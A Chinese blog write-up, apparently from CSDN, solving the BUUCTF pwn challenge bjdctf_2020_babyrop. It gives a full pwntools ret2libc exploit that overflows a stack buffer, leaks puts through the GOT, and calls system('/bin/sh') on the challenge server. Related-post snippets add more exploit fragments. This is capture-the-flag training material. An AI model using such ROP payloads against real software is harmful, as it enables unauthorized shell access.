BUUCTF-bjdctf_2020_babyrop1-WP

最新推荐文章于 2024-01-07 15:09:54 发布
最新推荐文章于 2024-01-07 15:09:54 发布
阅读量246 收藏
点赞数
文章标签: linux 运维 服务器 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arraylocalhost/article/details/127378813
版权

0x1 checksec

只有NX保护 

0x2 IDA

溢出点

没有其它有用的函数,考虑用ret2libc3,另外需注意是64位传参及寄存器的使用

ret2libc3也是经典的例题了 

0x3 EXP

from pwn import *
from LibcSearcher import *

#p=process("./bjdctf")
p=remote("node4.buuoj.cn",28450)
elf=ELF("./22bjdctf2020babyrop")
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
p.recvuntil(b"story!\n")
pop_rdi_ret=0x400733
start=0x400530
ret=0x400734

payload1=b"A"*(0x28)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(start)
p.sendline(payload1)
#puts=u64(p.recvline()[:-1].ljust(8,b'\x00'))
puts=u64(p.recv(6).ljust(8,b'\x00'))
libc=LibcSearcher("puts",puts)
libcbase=puts-libc.dump("puts")
system=libcbase+libc.dump("system")

str_bin_sh=libcbase+libc.dump("str_bin_sh")
payload2=b"A"*(0x28)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(system)

p.recvuntil(b"story!\n")
p.sendline(payload2)


p.interactive()

Rt1Text
关注
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1523
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
buuctf-[BJDCTF2020]ZJCTF,不过如此
qq_42728977的博客
12-26 2371
[BJDCTF2020]ZJCTF,不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
bjdctf2020 babyrop
pondzhang的专栏
05-09 306
from pwn import * p = process('./bjdctf_2020_babyrop') libcelf = ELF('./libc-2.23.so') pop_rdi_ret = 0x0000000000400733 pop_rsi_r15_ret = 0x0000000000400731 pltputs = 0x00000000004004E0 main = 0x00000000004006AD gotputs = 0x0000000000601018 payload = 'a' *
bjdctf_2020_babyrop
、moddemod
06-23 413
exp from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './bjdctf_2020_babyrop' p = process(proc_name) # p = remote('node3.buuoj.cn', 28227) elf = ELF(proc_name) read_got = elf.got['read'] puts_plt = elf.plt['puts'] main_.
[BUUOJ]bjdctf_2020_babyrop
Do1phln的博客
10-24 422
先checksec,64位小端序,MX保护开,其它全关,接着进入IDA分析main函数内很简单,进一步分析后找到关键函数vuln本题没有找到backdoor,所以应该是做基地址泄露然后getshell,整个程序内只有puts函数可以输出内容,因此对puts函数进行修改,先溢出后转到此处,考虑到系统会对堆栈进行平衡,所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡,因此使用ROPgadget先找到符合我们条件的ROPputs_got是puts函数的got表项地址,里面装的是puts的真实地址。使用
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 747
bjdctf_2020_babyrop
powervault-me4-series-linux-dell-emc-2018-3924-bp-l_wp_en-us.pdf
09-07
This document provides best practices for Dell EM PowerVaul ME4 Series storage with Red Hat® Enterprise Linux® (RHEL) or Oracle® Linux
BUUCTF [BJDCTF2020]Easy MD51 解析WP
最新发布
m0_73615178的博客
01-07 1252
首先,看题有个文本框和一个提交按钮,那么大致注入点从注入框下手,随意输入一个值,通过抓包和分析网址得出,传参方式为GET方式,后端判断语句为sql语句“select * from 'admin' where password=md5($pass,true)”,其中利用散列函数md5加密了password。MD5函数介绍, 语法:md5(string,raw),其中string要计算的字符串,raw(可选)规定十六进制或二进制输出格式true为原始16字符二进制格式,默认false32字符16进制格式。
BUUCTF gyctf_2020_borrowstack
BengDouLove的博客
04-22 822
第一个read的只能溢出0x10字节,也就是刚好覆盖返回地址,如果要ROP地方肯定不够 所以栈迁移到bank,在那里ROP 之前没遇到过这样的题,怎么迁过去我苦思冥想,最终还是看了wp,,用两个leave来控制rsp和rbp寄存器,太妙了 leave是个伪代码,,分解开就是 mov rsp,rbp pop rbp 如果把栈构造成这样 ‘A’ * 0x60 bank_addr leave_...
BUUCTF-easy_tornado
wuerror的博客
07-07 3656
这题是2018护网杯原题的复现。 进去之后显示三个txt,每个点进去看看。内容如下: /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) 看看url,发现web9.buuoj.cn/file?filename=/flag.txt&fil...
[BUUCTF-pwn]——bjdctf_2020_babyrop
Y_peak的博客
02-12 301
[BUUCTF-pwn]——bjdctf_2020_babyrop 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop 还是先checksec 一下 在IDA中看看 利用泄露地址和LibcSearcher库,找到对应的 libc版本算对偏移就可以找到system函数和 ‘/bin/sh’ 字符串. 因为64位,所以找下pop指令 思路: 泄露任意函数地址, 找到对应libc版本, 利用偏移寻找system函数和 ‘/bin/sh’ 字符串.
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 2996
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
[PWN] BUUCTF bjdctf_2020_babyrop
空城惜梦的博客
06-04 553
构造常规的ROP链,三种找到libc版本的方法分析寻找libc版本1.利用LibcSearcher来查找libc版本payload2.通过特殊网址来查找libc版本3.通过gdb来查找libc版本payload 分析 按照惯例checksce ,发现开了NX和RELRO 运行程序,查看程序的运行逻辑,从图中的红框可以猜测是一道泄露libc的题目 接着用IDA查看程序中主要函数存在的漏洞,可以看到 buf这个字符串数组只有0x20字节,而read却可以读取0x64个字节,所以这里存在着栈溢出 shift
bjdctf_2020_babystack
、moddemod
06-13 793
exp from pwn import * context(log_level = 'debug') proc_name = './bjdctf_2020_babystack' elf = ELF(proc_name) # p = process(proc_name) p = remote('node3.buuoj.cn', 29943) pop_ret = 0x400833 system_addr = elf.sym['system'] bin_sh_str = 0x400858 payload =..
buuctf刷题——[OGeek2019]babyrop 1
qq_41560595的博客
03-14 3635
好久好久没做ctf题了,今天得空刷刷buuctf,emm,发现好多都忘了。???????????? 查看权限 不能利用shellcode,但可以构造栈溢出。 查看源程序 为了方便区分,重命名了下函数。 open函数的返回值:如果操作成功,它将返回一个文件描述符,如果操作失败,它将返回-1; 文件描述符:0,1,2是标准IO输入/输出/错误输出给占用了,当文件open成功了,会返回数值3; read(fd,&buf,4u)是把fd所指向的随机数写入到buf文件中,长度是4个字节。 此时,buf是
writeUP-[OGeek2019]babyrop 1
weixin_52111404的博客
08-12 713
本题之前做过类似题型,在此主要记录使用LibcSearcher时遇到的问题。
babyrop
qq_46441427的博客
07-09 224
文章目录一、题目特征二、使用步骤1.引入库2.读入数据总结 一、题目特征 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._create_default_https_context = ssl.
ctfshow-__萌新隐写
09-14
根据引用中提到的内容,CTFShow "萌心区"WP详解(上)涉及了一些关于萌新认证的内容,其中包括了密码、隐写和杂项等方面的题目。而引用中提到,下载的文件是一个word文件,里面包含了一张图,并且提示说找到了FLAG。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值